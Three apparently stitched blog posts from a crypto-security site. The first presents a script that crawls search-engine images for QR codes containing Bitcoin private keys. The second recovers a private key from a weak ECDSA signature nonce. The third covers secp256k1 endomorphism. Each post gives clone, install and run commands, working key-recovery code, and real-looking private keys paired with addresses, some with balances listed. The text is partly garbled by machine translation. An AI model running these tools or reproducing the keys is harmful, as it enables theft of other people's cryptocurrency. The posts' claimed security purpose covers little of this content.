MrRobotQR scan QR codes from search engines in search of private keys of Bitcoin Wallets

 CRYPTO DEEP TECH

We all know the phrase:  «Everything that gets on the Internet, remains in it forever and becomes publicly available.»

Down to hidden content.

The  2021 году pandemic brought back popularity  QR-кодов. For  the first time QR-коды they were used in production in  1994 году a subsidiary  Toyota in Japan and introduced them at an assembly plant to control produced cars and parts for them. Unlike a barcode,  QR-код it contains more information, which prompted the manufacturer to introduce innovations. The technology began to spread mainly in Asian countries, and in the  2003 году Chinese company  Inspiry  developed a special reading mechanism  QR-кодовthat allowed it to be done quickly, which fueled its popularity. However, widespread use was already in the period of mass use of  tablets  and  smartphones.when reading became available through the camera of the wearable device.

Devices from the Chinese company Inspiry

On the one hand, QR codes provide all the conveniences in payments  BTC, since you can not spend half an hour on making a transfer. It is enough to point the smartphone at  QR-код and the payment form with all the filled fields will be generated by itself, all that remains is to press the button with payment confirmation.

Переводы.  оплаты.  QR-коды just an irreplaceable thing and the most important thing is that all this  saves our time .

There is one more important thing to remember:

Googlebot,  Bingbot,  Baidubot work  24/7 and at any time can store private data in their giant servers.

In search of hidden content from the depths of search engines, heroes in black hoodies, completely opposite to search bots, from the famous TV series Mr. Robot are connected  (Mr. Robot) .

«MrRobotQR» is  an open source script that automates the process from entering a search keyword to deriving the private key of a Bitcoin wallet.

Requires Python 3 and Bash to run the script

Bash script:  mrrobotqr.sh  automates the following steps:

Run  the Python script:  qrcrawler.p y  with the specified  keywords  to search and scan  images  in  Google,  Bing and  Baidu.

All found images will be uploaded to a folder  qrbooty with subfolders for each search engine. The script then renames and moves the files from the subfolders to a folder  qrbooty with unique names.

The next step is to run a  Python script:  qr2key.py  to scan the downloaded  images  in the folder  qrbooty for the presence  QR-кодов and check if they contain the  private keys of the  Bitcoin wallet. All private keys will be saved to a text file:  keylist.txt.

After re-processing, the script  removes duplicates  in  keylist.txt and outputs  the unique key  to a new file:  keylist_unique.txt , which will already contain all the  unique private keys  of the Bitcoin wallet.

Installation and launch:

Open  [TerminalGoogleColab] .

Let’s use the «10MrRobotQR « repository  .

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/10MrRobotQR/

ls

Install the ZBar barcode reader software package

sudo apt install python3-dev python3-setuptools python3-pip libzbar0 libzbar-dev

---

Install all the packages, modules and libraries we need:

cat requirements.txt

pip3 install -r requirements.txt

---

File permissions:

chmod +x mrrobotqr.sh
chmod +x qr2key.py
chmod +x qrcrawler.py

"bitcoin qr" —  keyword for search engines

Running a bash script:

./mrrobotqr.sh "bitcoin qr"

We open and look at all saved unique keys in the file: keylist_unique.txt

cat keylist_unique.txt

---

History of searches with a positive balance of BTC coins:

Let’s open bitaddress and   check:

Private Key WIF: L4vNZ86Pp6mkEPSPz9EcELK8cp1BxP3LWjxh7QvDanuMQBUJT9cG
Bitcoin Address: 1JhCAfiAbwJSa65c2EDCfC9fbEwyzZZb25
Total balance:   0.01393000 BTC

---

Private Key WIF: L2HcNb8wPCQ2gpL4oT5Mn6cvKqfAFjCqK3qWquak9BvYasbgWxxF
Bitcoin Address: 18cif9QYoSPSrmv9MN157mUejyNMr5wYVx
Total balance:   0.01313000 BTC

---

Private Key WIF: KwFs9DSx3qQbagnRiZ2niczs5QteL1bE13mBdXFGAW1He7BxQ9qz
Bitcoin Address: 1KyUqCo3pbBHvCp7ZcBvUSEaTLBocUAoU3
Total balance:   0.03611000 BTC

---

Private Key WIF: L5CGhW2yDnq3pGQdKm3ocM3AE32EekoKkKN6DvUqstziayr1R79V
Bitcoin Address: 1AuRL68EyKTFAafj98GR2oAi7b9abNr3ja
Total balance:   0.03602000 BTC

---

Private Key WIF: L3sxBKQ8HbFAv2vshfsL6RTEX8zP9CLDzw9BCh6hd5VTiihoAX5n
Bitcoin Address: 1H957muSj2Sn23Mnym5DEoYquQqviqc7Ch
Total balance:   0.03628000 BTC

---

Private Key WIF: KzpPtHkQbZj32Pxtoo31bPZtbVbVV5DASdmaFWawgrYXBxhfNoLj
Bitcoin Address: 1PCLwUTMj6z7up1mDGbEbMVhaQif9xBB5M
Total balance:   0.03632000 BTC

---

Private Key WIF: L1DoUbneUoNAMqFHeGyerzXyxwbzYWB1mD2JL8sn855EgZKJxC5d
Bitcoin Address: 1N5rmtTVvtTkVPB8xJNPx3bbaS7kZX2kX
Total balance:   0.01466000 BTC

---

Private Key WIF: KzcTCCpwMFu3yS5EBczmD9bv4GSD42vCoicJzCrZdm4eyYRvBiGE
Bitcoin Address: 1WeWVwSsUDgtMagerivywQzmBbeL2ETVJ
Total balance:   0.03677000 BTC

---

Private Key WIF: Kydoae8uQDUjxVWqqgqzoTQtMYkA6x1MGiPTx76AuTzyxdBTAYHc
Bitcoin Address: 1Mz7STzHf3JBuG4fvXuiz1brGRXF2C4R9R
Total balance:   0.03498000 BTC

---

Private Key WIF: KzWA3G6wyAdWSpACmJXAec76xhFxMPhnzwKLK3pk1gxm4RencWmo
Bitcoin Address: 1HnBT3t4AKBP54UDTNGJB39DAv7caf7HP1
Total balance:   0.01601000 BTC

---

This video was created for the  CRYPTO DEEP TECH portal  to ensure the financial security of data and cryptography on elliptic curves  secp256k1 against weak signatures  ECDSA in cryptocurrency BITCOIN

Source

Telegram :  https://t.me/cryptodeeptech

Video: https://youtu.be/bNMg2iJhMpg

Source: https://cryptodeeptech.ru/mr-robot-qr

---

 Без рубрики

Bitcoin Wallet Recovery via ECDSA Short Signatures

 CRYPTO DEEP TECH

We all know that the disclosure of the secret key in the ECDSA signature can lead to the complete recovery of the Bitcoin Wallet. In our earlier articles, we looked at weaknesses and vulnerabilities in blockchain transactions, but there are also ECDSA short signatures that also lead to the full recovery of a Bitcoin Wallet.

Why are these ECDSA signatures called short?

You can get the answer to this question from the topic under discussion: «The shortest ECDSA signature» [The shortest ECDSA signature]

In our last article: «Reducing the private key through scalar multiplication using the ECPy + Google Colab library» we created a Python script: maxwell.py which generated a rather interesting public key for us

(0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63 , 0xc0c686408d517dfd67c2367651380d00d126e4229631fd03f8ff35eef1a61e3c)

As we know the value of the signature, "R"this is the public key from the private key(Nonce)

Take a look at Blockchain transaction: 11e6b169701a9047f3ddbb9bc4d4ab1a148c430ba4a5929764e97e76031f4ee3

RawTX:

0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000

The size of this transaction is only:156 байт

How can I restore a Bitcoin Wallet through ECDSA short signatures?

In the cryptanalysis of the Bitcoin blockchain, we use our own Bas h script:btcrecover.sh

bitcoin wallet recovery process

Bash script: btcrecover.sh

pip2 install -r requirements.txt
chmod +x btcrecover.sh


 ./btcrecover.sh 12yysAMhagEm67QCX85p3WQnTUrqcvYVuk


 ./btcrecover.sh 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT

Results:

| privkey : addr |

Let’s open bitaddress and   check:

ac8d0abda1d32aaabff56cb72bc39a998a98779632d7fee83ff452a86a849bc1:12yysAMhagEm67QCX85p3WQnTUrqcvYVuk
b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f:15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT

Let’s move on to the experimental part and analyze in more detail all the scripts for restoring a Bitcoin Wallet

Open  [TerminalGoogleColab] .

Let’s use the «09BitcoinWalletRecovery» repository .

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/09BitcoinWalletRecovery/

ls

Install all the necessary modules:

bitcoin
ecdsa
utils
base58

---

pip2 install -r requirements.txt

Using the breakECDSA.py script, we get from the RawTXsignature [R, S, Z]

python2 breakECDSA.py 0100000001afddd5c9f05bd937b24a761606581c0cddd6696e05a25871279f75b7f6cf891f250000005f3c303902153b78ce563f89a0ed9414f5aa28ad0d96d6795f9c6302200a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8012103151033d660dc0ef657f379065cab49932ce4fb626d92e50d4194e026328af853ffffffff010000000000000000016a00000000 > signatures.txt

The result will be saved to a file: signatures.txt

Let’s open the file:PublicKeys.txt

cat signatures.txt

R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

As we know from our last article , we know the secret key to generating the signature R

In our case, the secret key (Nonce) is:

0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0 --> 0x3b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63, 0x3f3979bf72ae8202983dc989aec7f2ff2ed91bdd69ce02fc0700ca100e59ddf3

Signatures:

K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de

Now that we know the value of [K, R, S, Z] we can get the private key using the formula and restore the Bitcoin Wallet.

To get the private key, let’s use the Python script: calculate.py

def h(n):
    return hex(n).replace("0x","")

def extended_gcd(aa, bb):
    lastremainder, remainder = abs(aa), abs(bb)
    x, lastx, y, lasty = 0, 1, 1, 0
    while remainder:
        lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
        x, lastx = lastx - quotient*x, x
        y, lasty = lasty - quotient*y, y
    return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)

def modinv(a, m):
    g, x, y = extended_gcd(a, m)
    if g != 1:
        raise ValueError
    return x % m
    
N = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141


K = 0x7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0
R = 0x00000000000000000000003b78ce563f89a0ed9414f5aa28ad0d96d6795f9c63
S = 0x0a963d693c008f0f8016cfc7861c7f5d8c4e11e11725f8be747bb77d8755f1b8
Z = 0x521a65420faa5386d91b8afcfab68defa02283240b25aeee958b20b36ddcb6de


print (h((((S * K) - Z) * modinv(R,N)) % N))

Let’s run the Python script: calculate.py

python3 calculate.py

PrivKey=b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f

Let’s open bitaddress and   check:

ADDR: 15HvLBX9auG2bJdLCTxSvjvWvdgsW7BvAT
WIF:  L3LxjEnwKQMFYNYmCGzM1TqnwxRDi8UyRzQpVfmDvk96fYN44oFG
HEX:  b6c1238de89e9defea3ea0712e08726e338928ac657c3409ebb93d9a0873797f

Private key found!

Bitcoin wallet restored!

Короткие подписи ECDSAis a potential threat of losing coins BTC , so we strongly recommend everyone to always update the software and use only verified devices.

This video was created for the  CRYPTO DEEP TECH portal  to ensure the financial security of data and cryptography on elliptic curves  secp256k1 against weak signatures  ECDSA in cryptocurrency BITCOIN

Source

Telegram :  https://t.me/cryptodeeptech

Video: https://youtu.be/xBgjWE5tA7Y

Source: https://cryptodeeptech.ru/shortest-ecdsa-signature

 Без рубрики

Speed ​​up secp256k1 with endomorphism

 CRYPTO DEEP TECH

In this article, we will look  secp256k1 at the endomorphism acceleration function that helps in optimizing the validation  ECDSA for the Bitcoin cryptocurrency, but first, a little history.

12 января 2009 года Satoshi Nakamoto sent Hal Finney   in the earliest bitcoin transactions  10 BTC.

That Satoshi Nakamoto chose Hal as the first recipient of Bitcoins is not surprising. Satoshi had great respect for Hal, who established himself as one of the world’s brightest programmers and cryptographers by developing the  PGP encryption system . Hal also laid an important foundation for the reusable proof-of-work that Satoshi would use in the development of Bitcoin.

Being one of the best cryptographers in the world, Hal realized that Bitcoin was a huge breakthrough immediately after he stumbled upon it.

Back in  it, 2008 году he called Bitcoin  «a very promising idea . »

This  tweet , posted by  11 января 2009 года, is proof enough that Hal  predicted the success of Bitcoin  before many even knew what it was.

Two years have passed and  2011 году Hal Finney as a developer and Bitcoin enthusiast wrote on the  Bitcointalk forum that  the secp256k1 endomorphism function can be used to speed up ECDSA signature verification

LAMBDA and BETA are the values ​​on the secp256k1 curve, where:

secp256k1 uses the following prime number for its x and y coordinates:

p = 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffc2f

and the order of the curve:

n = 0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141

The first step is to calculate the values ​​of  LAMBDA and  BETA, such that for any point on the curve  Q = (x, y):

LAMBDA * Q = (BETA*х mod р, у)

This is the so-called effectively computable  endomorphism , and it means that you can multiply any point on the curve  secp256k1 by this special value  very quickly by LAMBDAdoing a single multiplication  mod p.

The meaning found and published by Hal Finney:

LAMBDA = 0x5363ad4cc05c30e0a5261c028812645a122e22ea20816678df02967c1b23bd72

BETA = 0x7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee

Given that we can quickly multiply, the  LAMBDA, trick is to calculate  kQ. Let’s use the calculation first . Then   you need to break it into two parts   and  , each about half the width of  , so that: Q' = lambdaQkk1k2n

k = k1 + k2*LAMBDA  mod  n

then

k*Q = (k1 + k2*LAMBDA)*Q = k1*Q + k2*LAMBDA*Q = k1*Q + k2*Q'

This last expression can be computed efficiently using the double multiplication algorithm, and since  k1 and  k2 are half the length, we get a speedup.

The missing part splits  k into  k1 and  k2. The following  4 values ​​are used for this :

а1 = 0x3086d221a7d46bcde86c90e49284eb15
b1 = -0xe4437ed6010e88286f547fa90abfe4c3
а2 = 0x114ca50f7a8e2f3f657c1108d9d44cfd8
b2 = 0x3086d221a7d46bcde86c90e49284eb15

(it’s ok that a1 = b2)

We use them as follows to divide k:

c1 = RoundToNearestInteger(b2*k/n)
c2 = RoundToNearestInteger(-b1*k/n)

k1 = k - c1*a1 - c2*a2
k2 = -c1*b1 - c2*b2

We end up with roughly  20%-е a speedup due to the halving of the number of doublings.
This gives many algorithms that can be grouped on multiple points the performance they would have with twice the number of public keys.
This speedup at an equivalent level of optimization makes it  secp256k1 the fastest curve to test out of all the commonly used curves.

We learned about the existence of endomorphism in a more detailed study of the repository from the developer and researcher Jean Luc Pons

We previously published an article:  «Pollard’s Kangaroo find solutions to the discrete logarithm of secp256k1 PRIVATE KEY + NONCES in a known range»  ,  where we used the source code to build  Kangaroo  by  Jean Luc Pons .

Based on accelerated mechanism Jean Luc Pons pointed VanitySearch

Open  main.cpp

main.cpp

In lines  255  and  256  we see that Jean Luc Pons applied the elliptic curve acceleration function  secp256k1 using  endomorphism .

  lambda.SetBase16("5363ad4cc05c30e0a5261c028812645a122e22ea20816678df02967c1b23bd72");
  lambda2.SetBase16("ac9c52b33fa3cf1f5ad9e3fd77ed9ba4a880b9fc8ec739c2e0cfc810b51283ce");

Let’s move on to the experimental part:

As we remember from the  article,  we analyzed transactions of Bitcoin Address  14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
from the  Bitcoin Rich List  for a total of more than  10 million US dollars , take this Bitcoin Address as an example

Open Google Colab  [TerminalGoogleColab] in the terminal  and use the repository  «07EndomorphismSecp256k1»

git clone https://github.com/demining/CryptoDeepTools.git

cd CryptoDeepTools/07EndomorphismSecp256k1/

pip3 install base58

Open code  endomorphism.py  on line  145  we use all short values ​​to speed up  secp256k1 with  endomorphism

def split_scalar_endo(k):
    n = N
    a1 = 0x3086d221a7d46bcde86c90e49284eb15
    b1 = -0xe4437ed6010e88286f547fa90abfe4c3
    a2 = 0x114ca50f7a8e2f3f657c1108d9d44cfd8
    b2 = a1
    c1 = div_nearest(b2 * k, n)
    c2 = div_nearest(-b1 * k, n)
    k1 = mod(k - c1 * a1 - c2 * a2, n)
    k2 = mod(-c1 * b1 - c2 * b2, n)
    k1neg = k1 > POW_2_128
    k2neg = k2 > POW_2_128
    if k1neg:
        k1 = n - k1
    if k2neg:
        k2 = n - k2
    return (k1neg, k1, k2neg, k2)

Copy the private key in the  HEX-format that we published in the  article

HEX:  23d4a09295be678b21a5f1dceae1f634a69c1b41775f680ebf8165266471401b

Let’s run the Python script endomorphism.py specifying the private key:

python3 endomorphism.py 23d4a09295be678b21a5f1dceae1f634a69c1b41775f680ebf8165266471401b > pubkey.txt

The result of the public key will be saved to the file: pubkey.txt

Откроем файл: pubkey.txt и проверим:

cat pubkey.txt

04ca5606a1e820e7a2f6bb3ab090e8ade7b04a7e0b5909a68dda2744ae3b8ecbfa280a47639c811134d648e8ee8096c33b41611be509ebca837fbda10baaa1eb15

Next, get the Bitcoin Address by running the Python script pubtoaddr.py

python3 pubtoaddr.py

Откроем файл: BitcoinAddress.txt и проверим:

cat BitcoinAddress.txt

14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE

ADDR: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
WIF:  5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
HEX:  23d4a09295be678b21a5f1dceae1f634a69c1b41775f680ebf8165266471401b

Checking the private key on the bitaddress website

blockchain:

www.blockchain.com/btc/address/14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE

On this topic, you can read the literature:

• Gallant, Robert P., Robert J. Lambert, and Scott A. Wanston. «Faster point multiplication on elliptic curves with efficient endomorphisms» . Annual International Conference on Cryptology, pp. 190–200. Springer, Berlin, Heidelberg, (2001)
• Hankerson, Darrell, Alfred J. Menezes, and Scott Wanston. «A Guide to Elliptic Curve Cryptography» . Computer Reviews 46, no. 1 (2005)
• Hal Finney. bitcointalk —  «Acceleration of signature verification» . (2011)  https://bitcointalk.org/index.php?topic=3238.0
• Blahut, Richard E.  «Cryptography and Secure Communication» . Cambridge University Press, (2014)

This video was created for the  CRYPTO DEEP TECH portal  to ensure the financial security of data and cryptography on elliptic curves  secp256k1 against weak signatures  ECDSA in cryptocurrency BITCOIN

Source

Telegram :  https://t.me/cryptodeeptech

Video :  https://youtu.be/DH6FyNY-Gh0

Source : https://cryptodeeptech.ru/endomorphism

 Без рубрики